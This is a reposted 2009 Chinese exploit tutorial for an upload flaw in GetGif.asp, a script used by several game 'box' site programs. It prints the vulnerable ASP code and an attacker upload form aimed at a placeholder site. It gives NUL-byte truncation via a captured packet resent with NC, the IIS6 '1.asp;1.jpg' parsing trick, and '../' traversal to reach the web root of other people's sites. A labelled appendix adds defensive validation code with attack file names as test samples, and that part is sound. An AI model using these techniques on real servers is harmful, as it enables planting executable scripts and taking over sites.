Date: 2009-10-14 13:16:00  Source: compiled by this site

Vulnerability exploitation: upload flaw in the latest game "box" receiver programs [Network Technology]




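  This article, "Vulnerability exploitation: upload flaw in the latest game "box" receiver programs [Network Technology]", was collected by 七道奇 and reposted from the web. Copyright belongs to the article's author; this site makes no assessment of its views or content, and readers should judge for themselves. The content follows: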

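The write-up is brief, but everyone should be able to follow it!
Quite a few box programs have this vulnerability! 皇马, 吉利 and the like all seem to have it!
First, look at the code of the vulnerable file, which is named GetGif.asp
CODE: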
<!--#include file="config.asp"-->
<%
Response.Buffer = True
Server.ScriptTimeOut=180
'On Error Resume Next
'dim SavePath
ExtName = "jpg,gif,png" 'allowed extensions
SavePath =imgFolder 'save path
If Right(SavePath,1)<>"/" Then SavePath=SavePath&"/" 'append "/" to the directory
CheckAndCreateFolder(SavePath)
UpLoadAll_a = Request.TotalBytes 'total size of the client request
If(UpLoadAll_a<=0) Then
    Response.Write "Sorry"
    Response.End
end if
Set UploadStream_c = Server.CreateObject("ADODB.Stream")
UploadStream_c.Type = 1
UploadStream_c.Open
UploadStream_c.Write Request.BinaryRead(UpLoadAll_a)
UploadStream_c.Position = 0
FormDataAll_d = UploadStream_c.Read
CrLf_e = chrB(13)&chrB(10)
FormStart_f = InStrB(FormDataAll_d,CrLf_e)
FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e)
Set FormStream_h = Server.Createobject("ADODB.Stream")
FormStream_h.Type = 1
FormStream_h.Open
UploadStream_c.Position = FormStart_f + 1
UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3
FormStream_h.Position = 0
FormStream_h.Type = 2
FormStream_h.CharSet = "GB2312"
FormStreamText_i = FormStream_h.Readtext
FormStream_h.Close
'the file name is taken from the client-supplied part header, after the last "\"
FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g)
'FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"=")+2,FormEnd_g)
'Response.Write FileName_j
If(CheckFileExt(FileName_j,ExtName)) Then
    SaveFile = Server.MapPath(SavePath & FileName_j)
    'SaveFile=SavePath & FileName_j
    If Err Then
        Response.Write "Sorry"
        Err.Clear
        Response.End
    Else
        SaveFile = CheckFileExists(SaveFile)
        k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4
        l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2
        FormStream_h.Type=1
        FormStream_h.Open
        UploadStream_c.Position=k-1
        UploadStream_c.CopyTo FormStream_h,l
        FormStream_h.SaveToFile SaveFile,2
        SaveFileName = Mid(SaveFile,InstrRev(SaveFile,"\")+1)
        Response.write "OK"
        Response.End
    End If
Else
    Response.Write "Sorry"
    Response.End
End If
%>
<%
'Check whether the file type is acceptable
'(only the last three characters of the name are compared)
Function CheckFileExt(FileName,ExtName) 'file name, allowed upload file types
    FileType = ExtName
    FileType = Split(FileType,",")
    For i = 0 To Ubound(FileType)
        If LCase(Right(FileName,3)) = LCase(FileType(i)) then
            CheckFileExt = True
            Exit Function
        Else
            CheckFileExt = False
        End if
    Next
End Function
'Check whether the upload folder exists; create it if it does not
Function CheckAndCreateFolder(FolderName)
    fldr = Server.Mappath(FolderName)
    Set fso = CreateObject("Scripting.FileSystemObject")
    If Not fso.FolderExists(fldr) Then
        fso.CreateFolder(fldr)
    End If
    Set fso = Nothing
End Function
'Check whether the file exists; pick a new name if it does
Function CheckFileExists(FileName)
    Set fso=Server.CreateObject("Scripting.FileSystemObject")
    If fso.FileExists(SaveFile) Then
        i=1
        msg=True
        Do While msg
            CheckFileExists = Replace(SaveFile,Right(SaveFile,4),"_" & i & Right(SaveFile,4))
            If not fso.FileExists(CheckFileExists) Then
                msg=False
            End If
            i=i+1
        Loop
    Else
        CheckFileExists = FileName
    End If
    Set fso=Nothing
End Function
%>
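This is a very simple piece of upload code, and it has an upload vulnerability that brings the DVBBS upload vulnerability to mind. Write an HTML submission page yourself:
CODE:
<form action="http://www.xxx.com/getgif.asp" method="post" enctype="multipart/form-data" name="form1">
<p>
<input name="file" type="file" size="50">
</p>
<p>
<input type="submit" name="Submit" value="提交">
</p>
</form>
Then capture the request, change "20" to "00" in the packet, and upload it with NC. Readers who do not understand this step can refer to the DVBBS upload vulnerability.
The method above works against both IIS5 and IIS6. Another method targets the IIS6 parsing vulnerability: uploading a file named 1.asp;1.jpg also works!
There is also the matter of the path, because the default upload path is /img/.
Many box owners have changed this path, for example to /img001/, and some set the directory to something even more complicated.
The way to deal with this is to add "../" in the packet. More than one can be added; if the box owner has configured things in a really extreme way, multiple "../" can be submitted,
and when a submission error occurs, the previously submitted file will have been uploaded to the site's root directory! Analyze the specifics case by case.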
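A hardened replacement for the file-name handling in GetGif.asp, as an added example that is not part of the original article or of the box program. The hypothetical `SafeUploadName` function rejects every name pattern described above (a NUL byte, `1.asp;1.jpg`, `../`) and never reuses the client's name on disk; the 100-character limit and the sample names are constructed assumptions.

```vbscript
Option Explicit

' Hypothetical helper (not from GetGif.asp): returns a server-generated file
' name for an accepted upload, or "" when the client-supplied name is rejected.
Function SafeUploadName(clientName, allowedExts)
    Dim i, c, ok, dotPos, ext, allowed
    SafeUploadName = ""
    ' Assumed length limit; adjust to the application's needs.
    If Len(clientName) = 0 Or Len(clientName) > 100 Then Exit Function

    ' Whitelist by character code: 0-9, A-Z, a-z, "_", "-" and ".".
    ' NUL and other control bytes, ";", "/", "\" and ":" all fail here.
    For i = 1 To Len(clientName)
        c = AscW(Mid(clientName, i, 1))
        ok = (c >= 48 And c <= 57) Or (c >= 65 And c <= 90) Or (c >= 97 And c <= 122) _
             Or c = 95 Or c = 45 Or c = 46
        If Not ok Then Exit Function
    Next

    ' Exactly one dot, not in first position: no "..", no double extensions.
    dotPos = InStr(clientName, ".")
    If dotPos <= 1 Or dotPos <> InStrRev(clientName, ".") Then Exit Function

    ' Compare the whole extension, not just the last three characters.
    ext = LCase(Mid(clientName, dotPos + 1))
    ok = False
    For Each allowed In Split(allowedExts, ",")
        If ext = LCase(Trim(allowed)) Then ok = True
    Next
    If Not ok Then Exit Function

    ' The stored name is generated on the server; only the vetted extension is kept.
    SafeUploadName = Replace(Mid(CreateObject("Scriptlet.TypeLib").Guid, 2, 36), "-", "") & "." & ext
End Function

' Constructed sample names; run with cscript. Escape() makes a NUL visible as %00.
Dim samples, s
samples = Array("avatar.gif", "Photo_01.JPG", "1.asp;1.jpg", _
                "x.asp" & Chr(0) & ".jpg", "../../x.jpg", "a.asp.jpg")
For Each s In samples
    If SafeUploadName(s, "jpg,gif,png") = "" Then
        WScript.Echo "reject: " & Escape(s)
    Else
        WScript.Echo "accept: " & Escape(s)
    End If
Next
```

Only the first two sample names are accepted. The function validates the name only; disabling script execution on the upload directory in IIS is a separate control that it does not replace.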
 

